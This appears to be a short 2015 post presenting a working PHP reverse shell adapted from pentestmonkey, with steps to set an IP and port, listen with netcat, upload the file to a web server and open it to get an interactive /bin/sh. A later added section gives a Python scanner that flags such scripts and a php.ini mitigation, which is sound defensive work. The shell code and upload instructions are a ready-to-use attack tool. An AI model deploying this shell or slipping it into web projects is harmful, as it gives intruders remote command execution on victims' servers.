php-reverse-shell

2015-02-10 18:40

Function:

Returns an interactive shell.

Usage:

First change the two variables $ip and $port in the script to the values you need, then listen on $port locally. For example:

$ip = '192.168.1.111'; // CHANGE THIS

$port = 13123; // CHANGE THIS

nc -v -l -p 13123

Then upload the PHP script file and open it in a browser.


Source code (modified from the original):

<?php
set_time_limit (0);
$ip = "192.168.1.111";
$port = "13123";

$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock)
    exit("$errstr ($errno)");

if(function_exists('proc_open')){
    $descriptorspec = array(
        0 => array("pipe", "r"),
        1 => array("pipe", "w"),
        2 => array("pipe", "w")
    );
    $process = proc_open("id;/bin/sh -i", $descriptorspec, $pipes);
    if (!is_resource($process))
        exit("ERROR: Can't reverse shell");

    stream_set_blocking($pipes[0], 0);
    stream_set_blocking($pipes[1], 0);
    stream_set_blocking($pipes[2], 0);
    stream_set_blocking($sock, 0);

    print("Successfully opened reverse shell to $ip:$port");

    while (1) {
        if (feof($sock)) {
            print("ERROR: Shell connection terminated");
            break;
        }

        if (feof($pipes[1])) {
            print("ERROR: Shell process terminated");
            break;
        }

        $input = fread($sock, 1024);
        fwrite($pipes[0], $input);

        $output = fread($pipes[1], 1024);
        fwrite($sock, $output);

        $output = fread($pipes[2], 1024);
        fwrite($sock, $output);
    }
    fclose($sock);
    fclose($pipes[0]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($process);
}
else print "function 'proc_open' is not exists.";
?>
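
For defenders checking a web root for this script, an added example (not part of the original post or of the pentestmonkey tool): a Python static check that flags PHP source combining an outbound socket call, process spawning and an interactive shell string, the combination visible in the code above. The function-name alternatives beyond those on the page, the indicator labels and both samples are assumptions constructed for illustration.

```python
import re

# fsockopen, proc_open, "/bin/sh -i", set_time_limit(0) and
# stream_set_blocking(..., 0) come from the script on this page; the other
# alternatives and the group labels are assumptions added for coverage.
INDICATORS = {
    "outbound_socket": re.compile(
        r"\b(fsockopen|pfsockopen|stream_socket_client|socket_connect)\s*\(", re.I),
    "process_spawn": re.compile(
        r"\b(proc_open|popen|shell_exec|passthru|system|exec)\s*\(", re.I),
    "interactive_shell": re.compile(r"/bin/(ba|da|z)?sh\s+-i\b"),
    "no_time_limit": re.compile(r"\bset_time_limit\s*\(\s*0\s*\)", re.I),
    "nonblocking_io": re.compile(
        r"\bstream_set_blocking\s*\([^)]*,\s*(0|false)\s*\)", re.I),
}

# Matches a quoted string (group 1, kept) or a PHP comment (dropped).
_TOKEN = re.compile(
    r'''("(?:\\.|[^"\\])*"|'(?:\\.|[^'\\])*')|/\*.*?\*/|(?://|#)[^\n]*''', re.S)

def strip_comments(source):
    """Remove comments but keep string literals such as "id;/bin/sh -i"."""
    return _TOKEN.sub(lambda m: m.group(1) or " ", source)

def scan_php(source):
    """Return (verdict, sorted indicator names) for one PHP source text."""
    code = strip_comments(source)
    hits = {name for name, rx in INDICATORS.items() if rx.search(code)}
    if {"outbound_socket", "process_spawn"} <= hits:
        verdict = "reverse-shell pattern" if "interactive_shell" in hits else "suspicious"
    else:
        verdict = "clean"
    return verdict, sorted(hits)

# Constructed samples: an excerpt of the lines shown above, and a benign
# health check whose only mention of proc_open sits in a comment.
SAMPLE_SHELL = r'''<?php
set_time_limit (0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
$process = proc_open("id;/bin/sh -i", $descriptorspec, $pipes);
stream_set_blocking($sock, 0);
'''
SAMPLE_BENIGN = r'''<?php
// health check; never calls proc_open("/bin/sh -i")
$fp = fsockopen("127.0.0.1", 80, $errno, $errstr, 5);
echo $fp ? "up" : "down, see http://status.example/help";
'''

if __name__ == "__main__":
    for label, src in (("shell", SAMPLE_SHELL), ("benign", SAMPLE_BENIGN)):
        print(label, scan_php(src))
```

Because the script above stops at its function_exists('proc_open') check when that function is unavailable, listing proc_open in the disable_functions directive of php.ini blocks this particular script; the scan is a complement for finding uploaded copies.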


Original: http://pentestmonkey.net/tools/web-shells/php-reverse-shell